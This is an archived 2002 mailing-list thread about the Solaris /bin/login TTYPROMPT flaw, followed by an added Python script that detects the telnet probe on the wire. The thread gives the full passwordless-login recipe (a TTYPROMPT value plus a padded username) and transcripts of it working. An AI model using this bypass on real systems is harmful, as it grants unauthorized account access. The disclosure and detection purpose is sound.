Re: Solaris 2.6, 7, 8

From: Roy Kidder (rkidderat_private)
Date: Thu Oct 03 2002 - 12:03:13 PDT

    Works like a champ on Solaris 2.6/Sparc:
    
    
    ---------- begin ----------
    
    ~ $ telnet
    telnet> environ define TTYPROMPT abcdef
    telnet> o localhost
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
    
    
    SunOS 5.6
    
    bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    Last login: Thu Oct  3 14:49:33 from localhost
    Sun Microsystems Inc.   SunOS 5.6       Generic August 1997
    You have new mail.
    bin@ovcle$ uname -a
    SunOS ovcle 5.6 Generic_105181-14 sun4u sparc SUNW,Ultra-4
    bin@ovcle$ who am i 
    bin        pts/6        Oct  3 15:05    (localhost)
    
    ---------- end ----------
    
    On Wed, 2002-10-02 at 13:23, Ramon Kagan wrote:
    > Sorry but I can't reproduce this on a Solaris 7 machine.
    > 
    > sunlight.ccs% telnet
    > telnet> environ define TTYPROMPT abcdef
    > telnet> o localhost
    > Trying 127.0.0.1...
    > Connected to localhost.
    > Escape character is '^]'.
    > 
    > 
    > SunOS 5.7
    > 
    > login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    > c c c
    > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\nPassword:
    > Login incorrect
    > 
    > 
    > As you can see I get a request for a username/password.
    > 
    > Ramon Kagan
    > York University, Computing and Network Services
    > Unix Team -  Intermediate System Administrator
    > (416)736-2100 #20263
    > rkaganat_private
    > 
    > -------------------------------------
    > I have not failed.  I have just
    > found 10,000 ways that don't work.
    > 	- Thomas Edison
    > -------------------------------------
    > 
    > On Wed, 2 Oct 2002, Jonathan S wrote:
    > 
    > > Hello,
    > >
    > >   Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
    > > environment variable TTYPROMPT.  This vulnerability has already been
    > > reported to BugTraq and a patch has been released by Sun.
    > >   However, a very simple exploit, which does not require any code to be
    > > compiled by an attacker, exists.  The exploit requires the attacker to
    > > simply define the environment variable TTYPROMPT to a 6 character string,
    > > inside telnet. I believe this overflows an integer inside login, which
    > > specifies whether or not the user has been authenticated (just a guess).
    > > Once connected to the remote host, you must type the username, followed by
    > > 64 " c"s, and a literal "\n".  You will then be logged in as the user
    > > without any password authentication.  This should work with any account
    > > except root (unless remote root login is allowed).
    > >
    > > Example:
    > >
    > > coma% telnet
    > > telnet> environ define TTYPROMPT abcdef
    > > telnet> o localhost
    > >
    > > SunOS 5.8
    > >
    > > bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
    > > c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
    > > Last login: whenever
    > > $ whoami
    > > bin
    > >
    > > Jonathan Stuart
    > > Network Security Engineer
    > > Computer Consulting Partners, Ltd.
    > > E-mail: jonsat_private
    > >
    > >
    > 
    -- 
    ===================================================
    Roy Kidder
    Data Network Engineer
    CoreComm
    ---------------------------------------------------
    "...these products' frequent failures are 
    legitimized by ubiquitous acquiescence." 
         -- Doc Searls on Microsoft products.
    ===================================================
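Added example (not code from any poster in this thread): the thread shows the probe only as typed into the telnet client, so this Python script reconstructs what it looks like on the wire and how a network monitor could flag it. It encodes the NEW-ENVIRON subnegotiation (RFC 1572) that `environ define TTYPROMPT abcdef` causes the client to send, parses such subnegotiations back out of a captured client-to-server stream, and reports two indicators taken from the thread: a client-exported TTYPROMPT and a login line padded with 64 " c" tokens. The sample sessions are constructed, not captured traffic; the assumption that the client sends the literal backslash-n followed by CR LF when Enter is pressed, the choice of USERVAR for TTYPROMPT (it is not one of RFC 1572's well-known names), and the 64-token threshold are mine.

```python
import re

# Telnet protocol constants (RFC 854) and NEW-ENVIRON option codes (RFC 1572).
IAC, SB, SE = 255, 250, 240
NEW_ENVIRON = 39
IS, SEND, INFO = 0, 1, 2           # subnegotiation commands
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3

# RFC 1572 well-known variable names travel as VAR; anything else, such as
# TTYPROMPT, is a user-defined variable and travels as USERVAR (assumption:
# this mirrors how BSD-derived telnet clients classify exported variables).
WELL_KNOWN = {"USER", "JOB", "ACCT", "PRINTER", "SYSTEMTYPE", "DISPLAY"}


def _escape(data: bytes) -> bytes:
    """Quote the bytes RFC 1572 reserves (VAR/VALUE/ESC/USERVAR) with ESC; double IAC."""
    out = bytearray()
    for b in data:
        if b == IAC:
            out += bytes([IAC, IAC])
        elif b in (VAR, VALUE, ESC, USERVAR):
            out += bytes([ESC, b])
        else:
            out.append(b)
    return bytes(out)


def encode_new_environ_is(variables: dict) -> bytes:
    """Build the IAC SB NEW-ENVIRON IS ... IAC SE reply a client sends for the
    variables it exports, e.g. after 'environ define TTYPROMPT abcdef'."""
    msg = bytearray([IAC, SB, NEW_ENVIRON, IS])
    for name, value in variables.items():
        msg.append(VAR if name in WELL_KNOWN else USERVAR)
        msg += _escape(name.encode("latin-1"))
        msg.append(VALUE)
        msg += _escape(value.encode("latin-1"))
    msg += bytes([IAC, SE])
    return bytes(msg)


def _parse_body(body: bytes) -> list:
    """Turn an IAC-unescaped NEW-ENVIRON IS/INFO body into (name, value) pairs."""
    items, name, value, field = [], None, None, None
    k = 0
    while k < len(body):
        b = body[k]
        if b in (VAR, USERVAR):                    # start of a new variable
            if name is not None:
                items.append((bytes(name).decode("latin-1"),
                              None if value is None else bytes(value).decode("latin-1")))
            name, value = bytearray(), None
            field = name
        elif b == VALUE and name is not None:      # switch from name to value
            value = bytearray()
            field = value
        elif b == ESC:                             # next byte is literal data
            k += 1
            if field is not None and k < len(body):
                field.append(body[k])
        elif field is not None:
            field.append(b)
        k += 1
    if name is not None:
        items.append((bytes(name).decode("latin-1"),
                      None if value is None else bytes(value).decode("latin-1")))
    return items


def parse_new_environ(stream: bytes) -> list:
    """Extract every (name, value) pair carried in NEW-ENVIRON IS/INFO
    subnegotiations anywhere in a captured client-to-server telnet stream."""
    pairs, i = [], 0
    marker = bytes([IAC, SB, NEW_ENVIRON])
    while True:
        start = stream.find(marker, i)
        if start < 0:
            return pairs
        body, j = bytearray(), start + 3
        while j < len(stream):                     # collect up to IAC SE
            if stream[j] == IAC and j + 1 < len(stream):
                if stream[j + 1] == SE:
                    break
                if stream[j + 1] == IAC:           # escaped 0xff data byte
                    body.append(IAC)
                    j += 2
                    continue
            body.append(stream[j])
            j += 1
        i = j + 2
        if body and body[0] in (IS, INFO):
            pairs.extend(_parse_body(bytes(body[1:])))


def ttyprompt_indicators(stream: bytes) -> dict:
    """Score one client-to-server session against the probe in this thread:
    a client-exported TTYPROMPT plus a login line padded with ' c' tokens."""
    ttyprompt = [v for n, v in parse_new_environ(stream) if n == "TTYPROMPT"]
    runs = re.findall(rb"(?: c)+", stream)
    max_c_run = max((len(r) // 2 for r in runs), default=0)
    return {
        "ttyprompt_values": ttyprompt,
        "max_c_run": max_c_run,
        # A client has no reason to export TTYPROMPT at all, and 64 is the
        # token count the posters typed, so either indicator alone is reported.
        "suspicious": bool(ttyprompt) or max_c_run >= 64,
    }


# Constructed sample sessions (not captured traffic): the probe as typed in the
# thread, and a benign login that exports only USER. The trailing backslash-n
# plus CR LF is an assumption about what the client sends when Enter is pressed.
PROBE_SESSION = (encode_new_environ_is({"TTYPROMPT": "abcdef"})
                 + b"bin" + b" c" * 64 + b"\\n\r\n")
BENIGN_SESSION = encode_new_environ_is({"USER": "jon"}) + b"jon\r\n"

if __name__ == "__main__":
    for label, session in (("probe", PROBE_SESSION), ("benign", BENIGN_SESSION)):
        print(label, ttyprompt_indicators(session))
```

The exported-TTYPROMPT check is the robust one: the variable is meant to be set by getty or telnetd on the server, so a client offering it in NEW-ENVIRON is itself the signal, whatever the value. The " c" run count is only corroboration, since the server logs in Ramon's and Roy's transcripts show the same padded line regardless of whether the login succeeded.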
    



    This archive was generated by hypermail 2b30 : Thu Oct 03 2002 - 12:33:27 PDT